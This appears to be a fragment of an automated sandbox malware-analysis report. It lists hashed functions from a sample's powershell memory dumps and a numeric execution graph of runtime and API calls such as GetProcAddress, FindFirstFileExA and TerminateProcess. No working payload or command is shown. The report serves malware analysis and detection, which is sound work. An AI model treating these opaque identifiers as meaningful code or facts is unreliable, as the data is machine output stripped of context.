                                                                                                    • Instruction Fuzzy Hash: AE118631D01599DBEF34DAD8E9987ECB771BF4931EF141429C002B6190EB7468CADB15
                                                                                                    Function 0443D006 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2379838904.000000000443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0443D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_443d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b498493113b0ba1d9a923fd088b032f2aedad31eba73300f033e8bb71b58c4a4
                                                                                                    • Instruction ID: 2c27831bff48abc9367954fc8f0d0c9a04038972ea0963f9b7e055e119e7a3f9
                                                                                                    • Opcode Fuzzy Hash: b498493113b0ba1d9a923fd088b032f2aedad31eba73300f033e8bb71b58c4a4
                                                                                                    • Instruction Fuzzy Hash: 6D019E6240E3C09FE7128B25DD94B52BFB4DF43628F0880DBD9888F2A3C2685849C772
                                                                                                    Function 0443D01D Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2379838904.000000000443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0443D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_443d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b09c33f14f2fb4d7ccd7b67d5fa4ede14f3201534042b4749880e28fac707c4d
                                                                                                    • Instruction ID: 8c4459a689ba6e261ae9c7b460552fd6d531f0d8294550af9a31fc5eb9a931a3
                                                                                                    • Opcode Fuzzy Hash: b09c33f14f2fb4d7ccd7b67d5fa4ede14f3201534042b4749880e28fac707c4d
                                                                                                    • Instruction Fuzzy Hash: 6D0120B1905340DAFB204F25ED80757BFA8DF45F69F18C01BDD041B242C678A442C6B1
                                                                                                    Function 073C3304 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5c3885a44568b6dbf8f0e3bc2ec4c7cc4f95832ff2cf8fc41d60666768c86a88
                                                                                                    • Instruction ID: 456746b7242519c76a30deff7bb2d07208c826fcc45de537737ca230996e9578
                                                                                                    • Opcode Fuzzy Hash: 5c3885a44568b6dbf8f0e3bc2ec4c7cc4f95832ff2cf8fc41d60666768c86a88
                                                                                                    • Instruction Fuzzy Hash: F9F0A9B520A2C18FE312CB54C890A54BF71AF83205B0DC0CAD0588F1A3CB269C47DB43
                                                                                                    Function 073C31B4 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9e23d3b73780f521df1d3f3997c5e842158dc756d2fc96b1377b068ff4e9853
                                                                                                    • Instruction ID: b6ddceeea61fe00c972cb4ffb5ccddfcebd9192c19e61deda98fdab7e4bcf5a5
                                                                                                    • Opcode Fuzzy Hash: c9e23d3b73780f521df1d3f3997c5e842158dc756d2fc96b1377b068ff4e9853
                                                                                                    • Instruction Fuzzy Hash: F8F0C9B050A2869FE716DB58C858A14BB72AF52245F1DC0DBC0888F1A7C7379D56CB52

                                                                                                    Non-executed Functions

                                                                                                    Function 0443D6CC Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2379838904.000000000443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0443D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_443d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e623fc6519ae0bd6ab61453e73ee70350285b3870d6fcbf2b2b1365935d2f7a
                                                                                                    • Instruction ID: 27c392655584c047d042520aa5df7d015c04fa9e1b0ddccd6e6e99a998ec64cf
                                                                                                    • Opcode Fuzzy Hash: 9e623fc6519ae0bd6ab61453e73ee70350285b3870d6fcbf2b2b1365935d2f7a
                                                                                                    • Instruction Fuzzy Hash: C92106B6A04244DFDF14DF10D9C0B27BF65FB88725F24856AD9090A256C336E456CBA1
                                                                                                    Function 073CE738 Relevance: 7.9, Strings: 6, Instructions: 374COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl$x.Xk$-Xk
                                                                                                    • API String ID: 0-2721235675
                                                                                                    • Opcode ID: 396c72a3af43b077f9634ff2863e791a4e67c7495abd00ff3c655750d885dffc
                                                                                                    • Instruction ID: a3bd5665434fc7d01f3b7692dd71656cdd2d796658a9e8bb62360b483db598f7
                                                                                                    • Opcode Fuzzy Hash: 396c72a3af43b077f9634ff2863e791a4e67c7495abd00ff3c655750d885dffc
                                                                                                    • Instruction Fuzzy Hash: 85E1D1B0A40205DBEB24DBA4C401B6EBBB2AFC8714F14842DD5056F795CF76EC428FA2
                                                                                                    Function 073C9C38 Relevance: 5.5, Strings: 4, Instructions: 481COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ]l$]l$]l$]l
                                                                                                    • API String ID: 0-3989967336
                                                                                                    • Opcode ID: d16879ca7e2ea6ccfd6f38f65e1f2bb1704df9c2297d6ad2e0219d97999b38ef
                                                                                                    • Instruction ID: f0d38fbe3039d06bdd9155303d30562c9e11cf10ca70238031c7183632fd1a58
                                                                                                    • Opcode Fuzzy Hash: d16879ca7e2ea6ccfd6f38f65e1f2bb1704df9c2297d6ad2e0219d97999b38ef
                                                                                                    • Instruction Fuzzy Hash: 69F148B2B042168FEB25CB78C80436ABBE5AFC5310F15C06ED449CB651DB72EC41CBA2
                                                                                                    Function 073CE718 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$x.Xk$-Xk
                                                                                                    • API String ID: 0-3576838702
                                                                                                    • Opcode ID: 048fe52f3c62945897fd19b13ac83e1a3ea405730618d54c3cc091419043aa6a
                                                                                                    • Instruction ID: 3524de9d01316b427e92c1622c904cd58fba120724cea411f1c5f7928f075ed7
                                                                                                    • Opcode Fuzzy Hash: 048fe52f3c62945897fd19b13ac83e1a3ea405730618d54c3cc091419043aa6a
                                                                                                    • Instruction Fuzzy Hash: 8EC1B1F0A40306DFEB24DBA4C441BAEBBB2AF88714F14855DD4096B755CB76AC42CF91
                                                                                                    Function 073C81D8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$(fgl$(fgl
                                                                                                    • API String ID: 0-2919359546
                                                                                                    • Opcode ID: 017549d5498c89984cd1721f0a2598e0b5403303dabbb91cfebd971b3794d633
                                                                                                    • Instruction ID: 30da69374e19a33be15d978958190dbddf19c218803dae9e940a9a57a35317c3
                                                                                                    • Opcode Fuzzy Hash: 017549d5498c89984cd1721f0a2598e0b5403303dabbb91cfebd971b3794d633
                                                                                                    • Instruction Fuzzy Hash: E37193B4A00205DFE724CF98C444AAEBBF2AF84715F14906DD4099B751CB32ED41CF95
                                                                                                    Function 073CE480 Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2412710009.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_73c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (fgl$(fgl$4dl$tLYk
                                                                                                    • API String ID: 0-562721780
                                                                                                    • Opcode ID: 415a65bc9d2ee1b83b8d1aa14c869e0ecfcedd330622f075f6accfbebd1bc4ab
                                                                                                    • Instruction ID: 53088cca7511168864daef11972c65a014951252fe40854c42235d614b2b85e2
                                                                                                    • Opcode Fuzzy Hash: 415a65bc9d2ee1b83b8d1aa14c869e0ecfcedd330622f075f6accfbebd1bc4ab
                                                                                                    • Instruction Fuzzy Hash: 4051AEF0A50201DBEB24DF58C444A6ABBF2AF89714F18C86DE509AB751DB32EC41CF95

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.7%
                                                                                                    Total number of Nodes:1658
                                                                                                    Total number of Limit Nodes:1
                                                                                                    execution_graph 7092 21bd543d 7093 21bd5440 7092->7093 7094 21bd55a8 _abort 38 API calls 7093->7094 7095 21bd544c 7094->7095 6023 21bd67bf 6028 21bd67f4 6023->6028 6026 21bd67db 6027 21bd571e _free 20 API calls 6027->6026 6029 21bd6806 6028->6029 6030 21bd67cd 6028->6030 6031 21bd680b 6029->6031 6032 21bd6836 6029->6032 6030->6026 6030->6027 6033 21bd637b _abort 20 API calls 6031->6033 6032->6030 6039 21bd71d6 6032->6039 6034 21bd6814 6033->6034 6036 21bd571e _free 20 API calls 6034->6036 6036->6030 6037 21bd6851 6038 21bd571e _free 20 API calls 6037->6038 6038->6030 6040 21bd71e1 6039->6040 6041 21bd7209 6040->6041 6042 21bd71fa 6040->6042 6045 21bd7218 6041->6045 6048 21bd8a98 6041->6048 6044 21bd6368 _free 20 API calls 6042->6044 6047 21bd71ff ___scrt_fastfail 6044->6047 6055 21bd8acb 6045->6055 6047->6037 6049 21bd8ab8 RtlSizeHeap 6048->6049 6050 21bd8aa3 6048->6050 6049->6045 6051 21bd6368 _free 20 API calls 6050->6051 6052 21bd8aa8 6051->6052 6067 21bd62ac 6052->6067 6056 21bd8ad8 6055->6056 6057 21bd8ae3 6055->6057 6091 21bd56d0 6056->6091 6059 21bd8aeb 6057->6059 6066 21bd8af4 _abort 6057->6066 6060 21bd571e _free 20 API calls 6059->6060 6063 21bd8ae0 6060->6063 6061 21bd8b1e RtlReAllocateHeap 6061->6063 6061->6066 6062 21bd8af9 6064 21bd6368 _free 20 API calls 6062->6064 6063->6047 6064->6063 6065 21bd474f _abort 7 API calls 6065->6066 6066->6061 6066->6062 6066->6065 6070 21bd6231 6067->6070 6069 21bd62b8 6069->6045 6071 21bd5b7a _abort 20 API calls 6070->6071 6072 21bd6247 6071->6072 6073 21bd6255 6072->6073 6074 21bd62a6 6072->6074 6078 21bd2ada _ValidateLocalCookies 5 API calls 6073->6078 6081 21bd62bc IsProcessorFeaturePresent 6074->6081 6076 21bd62ab 6077 21bd6231 _abort 26 API calls 6076->6077 6079 21bd62b8 6077->6079 6080 21bd627c 6078->6080 6079->6069 6080->6069 6082 21bd62c7 6081->6082 6085 21bd60e2 6082->6085 6086 21bd60fe ___scrt_fastfail 6085->6086 6087 21bd612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6086->6087 6088 21bd61fb ___scrt_fastfail 6087->6088 6089 21bd2ada _ValidateLocalCookies 5 API calls 6088->6089 6090 21bd6219 GetCurrentProcess TerminateProcess 6089->6090 6090->6076 6092 21bd570e 6091->6092 6096 21bd56de _abort 6091->6096 6093 21bd6368 _free 20 API calls 6092->6093 6095 21bd570c 6093->6095 6094 21bd56f9 RtlAllocateHeap 6094->6095 6094->6096 6095->6063 6096->6092 6096->6094 6097 21bd474f _abort 7 API calls 6096->6097 6097->6096 6677 21bd5bff 6685 21bd5d5c 6677->6685 6680 21bd5b7a _abort 20 API calls 6681 21bd5c1b 6680->6681 6682 21bd5c28 6681->6682 6692 21bd5c2b 6681->6692 6684 21bd5c13 6686 21bd5c45 _abort 5 API calls 6685->6686 6687 21bd5d83 6686->6687 6688 21bd5d9b TlsAlloc 6687->6688 6689 21bd5d8c 6687->6689 6688->6689 6690 21bd2ada _ValidateLocalCookies 5 API calls 6689->6690 6691 21bd5c09 6690->6691 6691->6680 6691->6684 6693 21bd5c35 6692->6693 6694 21bd5c3b 6692->6694 6696 21bd5db2 6693->6696 6694->6684 6697 21bd5c45 _abort 5 API calls 6696->6697 6698 21bd5dd9 6697->6698 6699 21bd5df1 TlsFree 6698->6699 6701 21bd5de5 6698->6701 6699->6701 6700 21bd2ada _ValidateLocalCookies 5 API calls 6702 21bd5e02 6700->6702 6701->6700 6702->6694 7096 21bd1f3f 7097 21bd1f4b ___DestructExceptionObject 7096->7097 7114 21bd247c 7097->7114 7099 21bd1f57 ___scrt_is_nonwritable_in_current_image 7100 21bd1f52 7100->7099 7101 21bd1f7c 7100->7101 7102 21bd2041 7100->7102 7125 21bd23de 7101->7125 7137 21bd2639 IsProcessorFeaturePresent 7102->7137 7105 21bd2048 7106 21bd1f8b __RTC_Initialize 7106->7099 7128 21bd22fc RtlInitializeSListHead 7106->7128 7108 21bd1f99 ___scrt_initialize_default_local_stdio_options 7129 21bd46c5 7108->7129 7112 21bd1fb8 7112->7099 7113 21bd4669 _abort 5 API calls 7112->7113 7113->7099 7115 21bd2485 7114->7115 7141 21bd2933 IsProcessorFeaturePresent 7115->7141 7119 21bd2496 7120 21bd249a 7119->7120 7152 21bd53c8 7119->7152 7120->7100 7123 21bd24b1 7123->7100 7208 21bd24b5 7125->7208 7127 21bd23e5 7127->7106 7128->7108 7132 21bd46dc 7129->7132 7130 21bd2ada _ValidateLocalCookies 5 API calls 7131 21bd1fad 7130->7131 7131->7099 7133 21bd23b3 7131->7133 7132->7130 7134 21bd23b8 ___scrt_release_startup_lock 7133->7134 7135 21bd2933 ___isa_available_init IsProcessorFeaturePresent 7134->7135 7136 21bd23c1 7134->7136 7135->7136 7136->7112 7138 21bd264e ___scrt_fastfail 7137->7138 7139 21bd26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7138->7139 7140 21bd2744 ___scrt_fastfail 7139->7140 7140->7105 7142 21bd2491 7141->7142 7143 21bd34ea 7142->7143 7144 21bd34ef ___vcrt_initialize_winapi_thunks 7143->7144 7163 21bd3936 7144->7163 7148 21bd3505 7149 21bd3510 7148->7149 7177 21bd3972 7148->7177 7149->7119 7151 21bd34fd 7151->7119 7200 21bd7457 7152->7200 7155 21bd3529 7156 21bd3543 7155->7156 7157 21bd3532 7155->7157 7156->7120 7158 21bd391b ___vcrt_uninitialize_ptd 6 API calls 7157->7158 7159 21bd3537 7158->7159 7160 21bd3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7159->7160 7161 21bd353c 7160->7161 7204 21bd3c50 7161->7204 7164 21bd393f 7163->7164 7166 21bd3968 7164->7166 7168 21bd34f9 7164->7168 7181 21bd3be0 7164->7181 7167 21bd3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7166->7167 7167->7168 7168->7151 7169 21bd38e8 7168->7169 7186 21bd3af1 7169->7186 7172 21bd38fd 7172->7148 7173 21bd3ba2 ___vcrt_FlsSetValue 6 API calls 7174 21bd390b 7173->7174 7175 21bd3918 7174->7175 7191 21bd391b 7174->7191 7175->7148 7178 21bd399c 7177->7178 7179 21bd397d 7177->7179 7178->7151 7180 21bd3987 RtlDeleteCriticalSection 7179->7180 7180->7178 7180->7180 7182 21bd3a82 try_get_function 5 API calls 7181->7182 7183 21bd3bfa 7182->7183 7184 21bd3c18 InitializeCriticalSectionAndSpinCount 7183->7184 7185 21bd3c03 7183->7185 7184->7185 7185->7164 7187 21bd3a82 try_get_function 5 API calls 7186->7187 7188 21bd3b0b 7187->7188 7189 21bd3b24 TlsAlloc 7188->7189 7190 21bd38f2 7188->7190 7190->7172 7190->7173 7192 21bd3925 7191->7192 7193 21bd392b 7191->7193 7195 21bd3b2c 7192->7195 7193->7172 7196 21bd3a82 try_get_function 5 API calls 7195->7196 7197 21bd3b46 7196->7197 7198 21bd3b5e TlsFree 7197->7198 7199 21bd3b52 7197->7199 7198->7199 7199->7193 7203 21bd7470 7200->7203 7201 21bd2ada _ValidateLocalCookies 5 API calls 7202 21bd24a3 7201->7202 7202->7123 7202->7155 7203->7201 7206 21bd3c59 7204->7206 7207 21bd3c7f 7204->7207 7205 21bd3c69 FreeLibrary 7205->7206 7206->7205 7206->7207 7207->7156 7209 21bd24c8 7208->7209 7210 21bd24c4 7208->7210 7211 21bd2639 ___scrt_fastfail 4 API calls 7209->7211 7213 21bd24d5 ___scrt_release_startup_lock 7209->7213 7210->7127 7212 21bd2559 7211->7212 7213->7127 7286 21bd9e71 7288 21bd9e95 7286->7288 7287 21bd9f71 __startOneArgErrorHandling 7293 21bdacad __startOneArgErrorHandling 7287->7293 7294 21bdb2f0 7287->7294 7288->7287 7289 21bd9ee6 7288->7289 7290 21bdaa53 21 API calls 7289->7290 7291 21bd9ef8 7289->7291 7290->7291 7295 21bdb329 __startOneArgErrorHandling 7294->7295 7297 21bdb350 __startOneArgErrorHandling 7295->7297 7305 21bdb5c1 7295->7305 7298 21bdb393 7297->7298 7299 21bdb36e 7297->7299 7318 21bdb8b2 7298->7318 7309 21bdb8e1 7299->7309 7302 21bdb38e __startOneArgErrorHandling 7303 21bd2ada _ValidateLocalCookies 5 API calls 7302->7303 7304 21bdb3b7 7303->7304 7304->7293 7306 21bdb5ec __raise_exc 7305->7306 7307 21bdb7e5 RaiseException 7306->7307 7308 21bdb7fd 7307->7308 7308->7297 7310 21bdb8f0 7309->7310 7311 21bdb90f __startOneArgErrorHandling 7310->7311 7312 21bdb964 __startOneArgErrorHandling 7310->7312 7325 21bd78a3 7311->7325 7314 21bdb8b2 __startOneArgErrorHandling 20 API calls 7312->7314 7316 21bdb95d 7314->7316 7316->7302 7317 21bdb8b2 __startOneArgErrorHandling 20 API calls 7317->7316 7319 21bdb8d4 7318->7319 7321 21bdb8bf 7318->7321 7320 21bd6368 _free 20 API calls 7319->7320 7322 21bdb8d9 7320->7322 7321->7322 7323 21bd6368 _free 20 API calls 7321->7323 7322->7302 7324 21bdb8cc 7323->7324 7324->7302 7326 21bd78cb 7325->7326 7327 21bd2ada _ValidateLocalCookies 5 API calls 7326->7327 7328 21bd78e8 7327->7328 7328->7316 7328->7317 6703 21bd63f0 6704 21bd6416 6703->6704 6705 21bd6400 6703->6705 6715 21bd6561 6704->6715 6716 21bd6480 6704->6716 6722 21bd6580 6704->6722 6706 21bd6368 _free 20 API calls 6705->6706 6707 21bd6405 6706->6707 6708 21bd62ac _abort 26 API calls 6707->6708 6710 21bd640f 6708->6710 6712 21bd64ee 6714 21bd571e _free 20 API calls 6712->6714 6713 21bd64e5 6713->6712 6719 21bd6573 6713->6719 6739 21bd85eb 6713->6739 6714->6715 6748 21bd679a 6715->6748 6733 21bd4e76 6716->6733 6720 21bd62bc _abort 11 API calls 6719->6720 6721 21bd657f 6720->6721 6723 21bd658c 6722->6723 6723->6723 6724 21bd637b _abort 20 API calls 6723->6724 6725 21bd65ba 6724->6725 6726 21bd85eb 26 API calls 6725->6726 6727 21bd65e6 6726->6727 6728 21bd62bc _abort 11 API calls 6727->6728 6729 21bd6615 ___scrt_fastfail 6728->6729 6730 21bd66b6 FindFirstFileExA 6729->6730 6731 21bd6705 6730->6731 6732 21bd6580 26 API calls 6731->6732 6734 21bd4e8b 6733->6734 6735 21bd4e87 6733->6735 6734->6735 6736 21bd637b _abort 20 API calls 6734->6736 6735->6713 6737 21bd4eb9 6736->6737 6738 21bd571e _free 20 API calls 6737->6738 6738->6735 6740 21bd853a 6739->6740 6742 21bd8554 6740->6742 6744 21bd854f 6740->6744 6746 21bd858b 6740->6746 6741 21bd6368 _free 20 API calls 6743 21bd857a 6741->6743 6742->6713 6745 21bd62ac _abort 26 API calls 6743->6745 6744->6741 6744->6742 6745->6742 6746->6742 6747 21bd6368 _free 20 API calls 6746->6747 6747->6743 6749 21bd67a4 6748->6749 6750 21bd67b4 6749->6750 6751 21bd571e _free 20 API calls 6749->6751 6752 21bd571e _free 20 API calls 6750->6752 6751->6749 6753 21bd67bb 6752->6753 6753->6710 7214 21bd5630 7216 21bd563b 7214->7216 7215 21bd5eb7 11 API calls 7215->7216 7216->7215 7217 21bd5664 7216->7217 7219 21bd5660 7216->7219 7220 21bd5688 7217->7220 7221 21bd56b4 7220->7221 7222 21bd5695 7220->7222 7221->7219 7223 21bd569f RtlDeleteCriticalSection 7222->7223 7223->7221 7223->7223 7329 21bd3370 7340 21bd3330 7329->7340 7341 21bd334f 7340->7341 7342 21bd3342 7340->7342 7343 21bd2ada _ValidateLocalCookies 5 API calls 7342->7343 7343->7341 6102 21bd3eb3 6105 21bd5411 6102->6105 6106 21bd541d _abort 6105->6106 6111 21bd5af6 GetLastError 6106->6111 6110 21bd5422 6131 21bd55a8 6110->6131 6112 21bd5b0c 6111->6112 6113 21bd5b12 6111->6113 6114 21bd5e08 _abort 11 API calls 6112->6114 6115 21bd637b _abort 20 API calls 6113->6115 6117 21bd5b61 SetLastError 6113->6117 6114->6113 6116 21bd5b24 6115->6116 6118 21bd5e5e _abort 11 API calls 6116->6118 6123 21bd5b2c 6116->6123 6117->6110 6120 21bd5b41 6118->6120 6119 21bd571e _free 20 API calls 6121 21bd5b32 6119->6121 6122 21bd5b48 6120->6122 6120->6123 6124 21bd5b6d SetLastError 6121->6124 6125 21bd593c _abort 20 API calls 6122->6125 6123->6119 6127 21bd55a8 _abort 35 API calls 6124->6127 6126 21bd5b53 6125->6126 6129 21bd571e _free 20 API calls 6126->6129 6128 21bd5b79 6127->6128 6130 21bd5b5a 6129->6130 6130->6117 6130->6124 6142 21bd7613 6131->6142 6134 21bd55b8 6136 21bd55e0 6134->6136 6137 21bd55c2 IsProcessorFeaturePresent 6134->6137 6172 21bd4bc1 6136->6172 6138 21bd55cd 6137->6138 6141 21bd60e2 _abort 8 API calls 6138->6141 6141->6136 6175 21bd7581 6142->6175 6145 21bd766e 6146 21bd767a _abort 6145->6146 6147 21bd5b7a _abort 20 API calls 6146->6147 6148 21bd76a1 _abort 6146->6148 6152 21bd76a7 _abort 6146->6152 6147->6148 6149 21bd76f3 6148->6149 6148->6152 6156 21bd76d6 6148->6156 6150 21bd6368 _free 20 API calls 6149->6150 6151 21bd76f8 6150->6151 6153 21bd62ac _abort 26 API calls 6151->6153 6154 21bd771f 6152->6154 6189 21bd5671 RtlEnterCriticalSection 6152->6189 6153->6156 6159 21bd777e 6154->6159 6161 21bd7776 6154->6161 6169 21bd77a9 6154->6169 6190 21bd56b9 RtlLeaveCriticalSection 6154->6190 6198 21bdbdc9 6156->6198 6159->6169 6191 21bd7665 6159->6191 6164 21bd4bc1 _abort 28 API calls 6161->6164 6164->6159 6166 21bd5af6 _abort 38 API calls 6170 21bd780c 6166->6170 6168 21bd7665 _abort 38 API calls 6168->6169 6194 21bd782e 6169->6194 6170->6156 6171 21bd5af6 _abort 38 API calls 6170->6171 6171->6156 6202 21bd499b 6172->6202 6178 21bd7527 6175->6178 6177 21bd55ad 6177->6134 6177->6145 6179 21bd7533 ___DestructExceptionObject 6178->6179 6184 21bd5671 RtlEnterCriticalSection 6179->6184 6181 21bd7541 6185 21bd7575 6181->6185 6183 21bd7568 _abort 6183->6177 6184->6181 6188 21bd56b9 RtlLeaveCriticalSection 6185->6188 6187 21bd757f 6187->6183 6188->6187 6189->6154 6190->6161 6192 21bd5af6 _abort 38 API calls 6191->6192 6193 21bd766a 6192->6193 6193->6168 6195 21bd77fd 6194->6195 6196 21bd7834 6194->6196 6195->6156 6195->6166 6195->6170 6201 21bd56b9 RtlLeaveCriticalSection 6196->6201 6199 21bd2ada _ValidateLocalCookies 5 API calls 6198->6199 6200 21bdbdd4 6199->6200 6200->6200 6201->6195 6203 21bd49a7 _abort 6202->6203 6204 21bd49bf 6203->6204 6224 21bd4af5 GetModuleHandleW 6203->6224 6233 21bd5671 RtlEnterCriticalSection 6204->6233 6211 21bd4aae 6216 21bdbdc9 _abort 5 API calls 6211->6216 6212 21bd4a82 6244 21bd4ab4 6212->6244 6213 21bd49c7 6219 21bd4a3c 6213->6219 6222 21bd4a65 6213->6222 6234 21bd527a 6213->6234 6220 21bd4ab3 6216->6220 6218 21bd4669 _abort 5 API calls 6218->6222 6221 21bd4a54 6219->6221 6237 21bd4669 6219->6237 6221->6218 6241 21bd4aa5 6222->6241 6225 21bd49b3 6224->6225 6225->6204 6226 21bd4b39 GetModuleHandleExW 6225->6226 6227 21bd4b63 GetProcAddress 6226->6227 6231 21bd4b78 6226->6231 6227->6231 6228 21bd4b8c FreeLibrary 6229 21bd4b95 6228->6229 6230 21bd2ada _ValidateLocalCookies 5 API calls 6229->6230 6232 21bd4b9f 6230->6232 6231->6228 6231->6229 6232->6204 6233->6213 6252 21bd5132 6234->6252 6238 21bd4698 6237->6238 6239 21bd2ada _ValidateLocalCookies 5 API calls 6238->6239 6240 21bd46c1 6239->6240 6240->6221 6274 21bd56b9 RtlLeaveCriticalSection 6241->6274 6243 21bd4a7e 6243->6211 6243->6212 6275 21bd6025 6244->6275 6247 21bd4ae2 6250 21bd4b39 _abort 8 API calls 6247->6250 6248 21bd4ac2 GetPEB 6248->6247 6249 21bd4ad2 GetCurrentProcess TerminateProcess 6248->6249 6249->6247 6251 21bd4aea ExitProcess 6250->6251 6255 21bd50e1 6252->6255 6254 21bd5156 6254->6219 6256 21bd50ed ___DestructExceptionObject 6255->6256 6263 21bd5671 RtlEnterCriticalSection 6256->6263 6258 21bd50fb 6264 21bd515a 6258->6264 6262 21bd5119 _abort 6262->6254 6263->6258 6265 21bd517a 6264->6265 6269 21bd5182 6264->6269 6266 21bd2ada _ValidateLocalCookies 5 API calls 6265->6266 6267 21bd5108 6266->6267 6270 21bd5126 6267->6270 6268 21bd571e _free 20 API calls 6268->6265 6269->6265 6269->6268 6273 21bd56b9 RtlLeaveCriticalSection 6270->6273 6272 21bd5130 6272->6262 6273->6272 6274->6243 6276 21bd604a 6275->6276 6277 21bd6040 6275->6277 6278 21bd5c45 _abort 5 API calls 6276->6278 6279 21bd2ada _ValidateLocalCookies 5 API calls 6277->6279 6278->6277 6280 21bd4abe 6279->6280 6280->6247 6280->6248 6281 21bd60ac 6282 21bd60dd 6281->6282 6283 21bd60b7 6281->6283 6283->6282 6284 21bd60c7 FreeLibrary 6283->6284 6284->6283 7344 21bd506f 7345 21bd5087 7344->7345 7346 21bd5081 7344->7346 7347 21bd5000 20 API calls 7346->7347 7347->7345 7224 21bd742b 7227 21bd7430 7224->7227 7225 21bd7453 7227->7225 7228 21bd8bae 7227->7228 7229 21bd8bbb 7228->7229 7230 21bd8bdd 7228->7230 7231 21bd8bc9 RtlDeleteCriticalSection 7229->7231 7232 21bd8bd7 7229->7232 7230->7227 7231->7231 7231->7232 7233 21bd571e _free 20 API calls 7232->7233 7233->7230 7348 21bdac6b 7349 21bdac84 __startOneArgErrorHandling 7348->7349 7350 21bdb2f0 21 API calls 7349->7350 7351 21bdacad __startOneArgErrorHandling 7349->7351 7350->7351 6285 21bdc7a7 6286 21bdc7be 6285->6286 6290 21bdc80d 6285->6290 6286->6290 6294 21bdc7e6 GetModuleHandleA 6286->6294 6288 21bdc835 GetModuleHandleA 6288->6290 6289 21bdc872 6290->6288 6290->6289 6291 21bdc85f GetProcAddress 6290->6291 6291->6290 6295 21bdc7ef 6294->6295 6296 21bdc80d 6294->6296 6303 21bdc803 GetProcAddress 6295->6303 6298 21bdc835 GetModuleHandleA 6296->6298 6299 21bdc872 6296->6299 6302 21bdc85f GetProcAddress 6296->6302 